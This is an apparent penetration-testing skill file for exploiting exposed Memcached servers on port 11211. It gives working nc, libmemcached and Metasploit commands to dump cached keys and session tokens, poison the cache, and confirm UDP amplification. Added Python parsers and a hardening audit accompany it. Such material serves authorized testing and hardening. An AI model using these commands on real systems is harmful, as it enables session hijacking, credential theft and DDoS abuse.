pentesting-memcached

```bash
npx mdskill add xalgord/xalgorix/pentesting-memcached
```


SKILL.md (.github/skills/pentesting-memcached)
---
name: pentesting-memcached
description: Testing Memcached distributed memory caching servers (default port 11211 TCP/UDP) for unauthenticated stats/version access, slab-based key dumping and cached-data exfiltration, cache poisoning, and the UDP reflection/amplification DDoS primitive during authorized engagements.
domain: cybersecurity
subdomain: network-services-pentesting
tags:
- penetration-testing
- network-services
- database
- memcached
version: '1.0'
author: xalgorix
license: Apache-2.0
---

# Pentesting Memcached (port 11211)

## When to Use
- Default port `11211` on **both TCP and UDP**; Memcached is a plain-text line protocol, so `nc` works directly.
- `nmap`/banner shows `11211/tcp open` and `version`/`stats` respond.
- Use whenever 11211 is reachable — Memcached supports SASL but **most instances are exposed with no authentication**. Remember it is a cache, so keys appear and disappear.

## Quick Enumeration
```bash
echo "version" | nc -vn -w 1 <IP> 11211      # version
echo "stats"   | nc -vn -w 1 <IP> 11211      # server stats (pid, uptime, curr_items)
echo "stats slabs" | nc -vn -w 1 <IP> 11211  # slab classes holding data
echo "stats items" | nc -vn -w 1 <IP> 11211  # item counts per slab

nmap -n -sV --script memcached-info -p11211 <IP>
msfconsole -q -x 'use auxiliary/gather/memcached_extractor; set RHOSTS <IP>; run; exit'
```

## Critical: Checks Most Often Missed
- **Unauthenticated stats/version access** — the #1 miss. Most instances answer `stats`/`version` with no auth, confirming exposure.
  - How to CONFIRM: `echo "stats" | nc -w1 <IP> 11211` returns `STAT pid ...`. Shodan dork: `port:11211 "STAT pid"`.
- **Key dumping → cached-data exfiltration** — enumerate slabs, list key names, then `get` them. Cached data routinely includes session tokens, SQL query results, and credentials.
  - How to CONFIRM (≤ 1.4.30): `echo "stats items" | nc -w1 <IP> 11211` then `echo "stats cachedump <slab> 0" | nc -w1 <IP> 11211` (the `0` = unlimited) lists `ITEM <key>`, then `echo "get <key>" | nc -w1 <IP> 11211` returns the value.
  - How to CONFIRM (≥ 1.4.31): `echo 'lru_crawler metadump all' | nc <IP> 11211` dumps key metadata (non-blocking, production-safe).
- **UDP reflection / amplification DDoS** — UDP 11211 with a tiny `stats`/`get` request yields a huge response, abused for spoofed-source amplification (the Memcrashed attacks).
  - How to CONFIRM: `nmap -sU -p11211 <IP>` shows UDP open; Metasploit `scanner/memcached/memcached_amp` reports amplification possible. Recommend disabling UDP (`-U 0`).
- **Cache poisoning** — write access (`set`/`add`) lets you tamper with cached application data (e.g. inject content, flip auth decisions cached in Memcached).
  - How to CONFIRM: `printf 'set evil 0 60 3\r\nabc\r\n' | nc -w1 <IP> 11211` returns `STORED`.

## Workflow

### Step 1: Enumerate
```bash
echo "version" | nc -vn -w 1 <IP> 11211
echo "stats"   | nc -vn -w 1 <IP> 11211       # note curr_items, total_items
echo "stats slabs" | nc -vn -w 1 <IP> 11211
echo "stats items" | nc -vn -w 1 <IP> 11211
nmap -sU -sV -p11211 <IP>                      # check UDP exposure
```

### Step 2: Authenticate (usually none; SASL if present)
```bash
# Most servers are unauthenticated. If SASL is enabled you need valid creds:
#   the binary protocol SASL handshake is required (libmemcached / mcrouter clients).
# Verify whether auth is required by attempting plain stats; a clean response = no auth.
echo "stats" | nc -w1 <IP> 11211
```

### Step 3: Exploit / Extract (dump keys + cached data)
```bash
# libmemcached-tools fast path
sudo apt install libmemcached-tools
memcstat --servers=<IP>                        # stats
memcdump --servers=<IP>                        # ALL key names
memccat  --servers=<IP> <key1> <key2>          # values for keys

# Manual slab dump (memcached <= 1.4.30)
echo "stats items" | nc -w1 <IP> 11211         # find slab class numbers
echo "stats cachedump 1 0" | nc -w1 <IP> 11211 # ITEM <key> ... per slab (0 = unlimited)
echo "get <key>" | nc -w1 <IP> 11211           # retrieve the value

# Production-safe dump (memcached >= 1.4.31)
echo 'lru_crawler metadump all' | nc <IP> 11211 | head

# PHP one-liner to enumerate keys
php -r '$c=new Memcached(); $c->addServer("<IP>",11211); var_dump($c->getAllKeys());'
```
```bash
# Cache poisoning (write test)
printf 'set app_flag 0 3600 1\r\n1\r\n' | nc -w1 <IP> 11211   # STORED
```
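The checks in "Critical: Checks Most Often Missed" and the dump commands in Step 3 all hinge on reading a handful of text-protocol response shapes correctly: `STAT <name> <value>` lines, `ITEM <key> [...]` lines from `stats cachedump`, `key=... size=...` lines from `lru_crawler metadump`, and the length-prefixed `VALUE` blocks a `get` returns. The following is an added example, not code from the xalgorix skill; every sample response in it is constructed to mirror those documented formats rather than captured from a server, and the `<slab>` placeholder in the cachedump command is carried over from the page. It also shows the version-based choice between the two key-listing commands that the page spells out in prose.

```python
"""Parsers for the Memcached text-protocol responses used by the checks above.
Added example, not code from the xalgorix skill; all samples are constructed."""
import re
from typing import Dict, List, Tuple
from urllib.parse import unquote

# Constructed: abridged answer to `stats` (the "STAT pid ..." no-auth signal).
SAMPLE_STATS = (
    "STAT pid 1234\r\nSTAT uptime 86400\r\nSTAT version 1.4.25\r\n"
    "STAT curr_items 42\r\nSTAT total_items 9001\r\nEND\r\n"
)
# Constructed: `stats cachedump 1 0` output (memcached <= 1.4.30).
SAMPLE_CACHEDUMP = (
    "ITEM session:abc123 [120 b; 1700000000 s]\r\n"
    "ITEM user:7:profile [512 b; 1700000300 s]\r\nEND\r\n"
)
# Constructed: `lru_crawler metadump all` output (>= 1.4.31); keys are URL-encoded.
SAMPLE_METADUMP = (
    "key=session%3Aabc123 exp=1700000000 la=1699999000 cas=5 fetch=yes cls=1 size=120\r\n"
    "key=user%3A7%3Aprofile exp=-1 la=1699999100 cas=6 fetch=no cls=3 size=512\r\n"
    "END\r\n"
)
# Constructed: `get session:abc123` output; the data block is length-prefixed.
SAMPLE_GET = b"VALUE session:abc123 0 9\r\ntok-12345\r\nEND\r\n"


def _lines(raw: str) -> List[str]:
    """Protocol lines up to (not including) the END terminator."""
    out = []
    for line in raw.split("\r\n"):
        if line == "END":
            break
        if line:
            out.append(line)
    return out


def parse_stats(raw: str) -> Dict[str, str]:
    """'STAT <name> <value>' lines -> dict."""
    stats = {}
    for line in _lines(raw):
        parts = line.split(" ", 2)
        if len(parts) == 3 and parts[0] == "STAT":
            stats[parts[1]] = parts[2]
    return stats


def is_unauthenticated(stats: Dict[str, str]) -> bool:
    """A plain-text `stats` answered with a pid line: no SASL is enforced."""
    return "pid" in stats


def parse_version(text: str) -> Tuple[int, ...]:
    """Accepts 'VERSION 1.4.25' (version command) or '1.4.25' (STAT version)."""
    match = re.search(r"(\d+(?:\.\d+)+)", text)
    if not match:
        raise ValueError(f"no version number in {text!r}")
    return tuple(int(p) for p in match.group(1).split("."))


def key_dump_command(version: Tuple[int, ...]) -> str:
    """Pick the key-listing command the skill documents for this release."""
    if version >= (1, 4, 31):
        return "lru_crawler metadump all"
    return "stats cachedump <slab> 0"


def parse_cachedump(raw: str) -> List[str]:
    """'ITEM <key> [<bytes> b; <exptime> s]' lines -> key names."""
    return [line.split(" ", 2)[1] for line in _lines(raw) if line.startswith("ITEM ")]


def parse_metadump(raw: str) -> List[Dict[str, str]]:
    """'key=... exp=... size=...' lines -> dicts, with the key URL-decoded."""
    items = []
    for line in _lines(raw):
        fields = dict(f.split("=", 1) for f in line.split(" ") if "=" in f)
        if "key" in fields:
            fields["key"] = unquote(fields["key"])
            items.append(fields)
    return items


def parse_get(raw: bytes) -> Dict[str, bytes]:
    """'VALUE <key> <flags> <bytes>\\r\\n<data>\\r\\n' blocks -> {key: data}.
    The byte count is authoritative: the data may itself contain \\r\\n."""
    values, pos = {}, 0
    while True:
        eol = raw.index(b"\r\n", pos)
        header = raw[pos:eol]
        if header == b"END":
            return values
        parts = header.split(b" ")
        if parts[0] != b"VALUE" or len(parts) < 4:
            raise ValueError(f"unexpected line {header!r}")
        start, nbytes = eol + 2, int(parts[3])
        values[parts[1].decode()] = raw[start:start + nbytes]
        pos = start + nbytes + 2  # skip the data block's own trailing \r\n


def build_set(key: str, data: bytes, exptime: int, flags: int = 0) -> bytes:
    """Encode the write test from the checks above; the length field must equal
    len(data) exactly, otherwise the server answers CLIENT_ERROR."""
    return f"set {key} {flags} {exptime} {len(data)}\r\n".encode() + data + b"\r\n"
```

Feed `parse_stats` the raw reply from `echo stats | nc <IP> 11211` and `key_dump_command(parse_version(stats["version"]))` tells you which of the two listing commands applies; `parse_get` is deliberately byte-count driven rather than line driven, because cached values (serialized sessions, query rows) often contain their own CRLFs.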

### Step 4: Post-access / impact / pivot
- Carve dumped values for session IDs, JWTs, API keys, cached DB rows, and credentials — reuse against the backing app/database.
- Note constraints: only **1MB per slab class** can be dumped this way, and the feature is unofficial; `peep` can dump everything but **freezes the memcached process** — avoid in production.
- Hijack sessions by reading/forging cached session tokens; poison cached auth/feature flags for privilege effects.
- If UDP is open, document the amplification DDoS exposure (high reflection factor) as a network-impact finding.

## Key Concepts
| Concept | Description |
|---------|-------------|
| **Slab / slab class** | Memory grouped by chunk size; keys are dumped per slab class. |
| **stats cachedump** | Legacy command listing key names per slab (≤ 1MB, deprecated). |
| **lru_crawler metadump** | Non-blocking key-metadata dump for memcached ≥ 1.4.31. |
| **No auth default** | SASL is supported but rarely enabled; most servers accept plain commands. |
| **UDP amplification** | Spoofed UDP requests on 11211 yield large responses for reflection DDoS. |
| **Cache volatility** | Data is transient; keys appear/disappear as items are evicted. |
| **1MB / page limit** | Default max object size and per-slab dump page constrain extraction. |

## Tools & Systems
| Tool | Purpose |
|------|---------|
| **nc / telnet** | Raw text-protocol interaction: `version`, `stats`, `cachedump`, `get`, `set`. |
| **libmemcached-tools** | `memcstat`, `memcdump` (all keys), `memccat` (values). |
| **nmap NSE** | `memcached-info` for unauthenticated info gathering. |
| **Metasploit** | `gather/memcached_extractor` (dump data), `scanner/memcached/memcached_amp` (UDP amplification check). |
| **php-memcached / perl memdump** | Scriptable key enumeration and value dumping. |
| **peep** | Workaround the 1MB limit to dump ALL keys — freezes the process (lab use only). |

## Common Scenarios
### Scenario 1: Unauth dump → session hijack
`echo stats | nc <IP> 11211` works with no auth. `memcdump` lists keys and `memccat` reveals cached session objects; the tester replays a valid session token to access the app as another user.

### Scenario 2: Cached credential exposure
An app caches SQL query results in Memcached. Dumping keys exposes rows containing usernames and password hashes, which are cracked and reused against SSH and the web login.

### Scenario 3: UDP amplification exposure
`nmap -sU -p11211` shows UDP open and `memcached_amp` confirms a large reflection factor. The exposure is reported as a reflection/amplification DDoS risk with a recommendation to disable UDP.

## Output Format
```
## Memcached Finding

**Service**: Memcached
**Port**: 11211/tcp+udp (memcached 1.4.25)
**Severity**: High
**Finding**: Unauthenticated Memcached exposing cached data and UDP amplification
**Evidence**:
  - `echo stats | nc <IP> 11211` -> STAT pid ... (no auth)
  - memcdump --servers=<IP> -> session:* keys; memccat revealed valid session tokens
  - nmap -sU -p11211 + memcached_amp -> amplification possible
**Impact**: Unauthenticated theft of cached secrets/session tokens and use of the server for reflection DDoS.
**Recommendation**:
  1. Bind to localhost / private interface and restrict 11211 by firewall.
  2. Disable UDP (`-U 0`) to eliminate amplification; enable SASL authentication.
  3. Avoid caching plaintext secrets/session material; encrypt sensitive cached values.
  4. Run memcached as an unprivileged user and keep it off untrusted networks.
```
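The recommendation list above can be turned into something checkable against how the daemon is actually started. The following is an added example, not code from the xalgorix skill: it audits a memcached command line using the `-U 0` flag named on the page plus `-l` (bind address), `-S` (enable SASL) and `-u` (run-as user) from memcached's own usage text. The two command lines it evaluates are constructed, and the statement that releases before 1.5.6 listened on UDP unless `-U 0` was passed is an assumption noted in a comment.

```python
"""Audit a memcached start-up command line against the hardening points above.
Added example, not code from the xalgorix skill; sample command lines are constructed."""
import ipaddress
from typing import Dict, List, Optional

VALUE_FLAGS = {"-l", "-U", "-p", "-u"}   # options that take an argument
BARE_FLAGS = {"-S"}                      # options that take none


def parse_memcached_argv(argv: List[str]) -> Dict[str, Optional[str]]:
    """Collect the exposure-relevant options; accepts both '-U 0' and '-U0'."""
    opts: Dict[str, Optional[str]] = {}
    i = 1  # argv[0] is the binary itself
    while i < len(argv):
        arg = argv[i]
        if arg in BARE_FLAGS:
            opts[arg] = None
        elif arg in VALUE_FLAGS:
            i += 1
            opts[arg] = argv[i] if i < len(argv) else ""
        elif len(arg) > 2 and arg[:2] in VALUE_FLAGS:
            opts[arg[:2]] = arg[2:]
        i += 1
    return opts


def classify_bind(listen: Optional[str]) -> str:
    """'all' (no -l, or an unspecified address), 'private' (every address is
    loopback or private), else 'public'. Hostnames cannot be verified offline
    and therefore count as public."""
    if listen is None:
        return "all"
    verdict = "private"
    for entry in listen.split(","):
        host = entry.strip()
        if host.startswith("["):            # [v6]:port form
            host = host[1:host.index("]")]
        elif host.count(":") == 1:          # v4:port form
            host = host.split(":")[0]
        try:
            addr = ipaddress.ip_address(host)
        except ValueError:
            return "public"
        if addr.is_unspecified:             # 0.0.0.0 / :: means every interface
            return "all"
        if not (addr.is_loopback or addr.is_private):
            verdict = "public"
    return verdict


def audit_memcached_argv(argv: List[str]) -> List[str]:
    """Finding ids for the recommendations that can be judged from flags alone;
    an empty list means none of them is violated."""
    opts = parse_memcached_argv(argv)
    findings = []
    bind = classify_bind(opts.get("-l"))
    if bind != "private":
        findings.append(f"bind-{bind}")
    udp = opts.get("-U")
    if udp is None:
        # Assumption: releases before 1.5.6 enabled UDP 11211 unless -U 0 was given,
        # so an absent -U is only safe on newer builds; flag it for review.
        findings.append("udp-not-disabled")
    elif udp != "0":
        findings.append("udp-enabled")
    if "-S" not in opts:
        findings.append("no-sasl")
    if not opts.get("-u"):
        findings.append("no-unprivileged-user")
    return findings


# Constructed command lines: the weak setting beside the corrected one.
WEAK = ["memcached", "-m", "64", "-p", "11211", "-U", "11211"]
HARDENED = ["memcached", "-m", "64", "-l", "127.0.0.1", "-U0", "-S", "-u", "memcache"]

if __name__ == "__main__":
    for label, argv in (("weak", WEAK), ("hardened", HARDENED)):
        print(f"{label}: {' '.join(argv[1:])} -> {audit_memcached_argv(argv) or 'ok'}")
```

The finding ids map directly onto the four recommendation items (bind/firewall, UDP and SASL, secret handling is out of scope for a flag check, unprivileged user), so the same function can be run over the `ps` output or the systemd unit of every host in scope and the results pasted into the evidence section of the finding.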
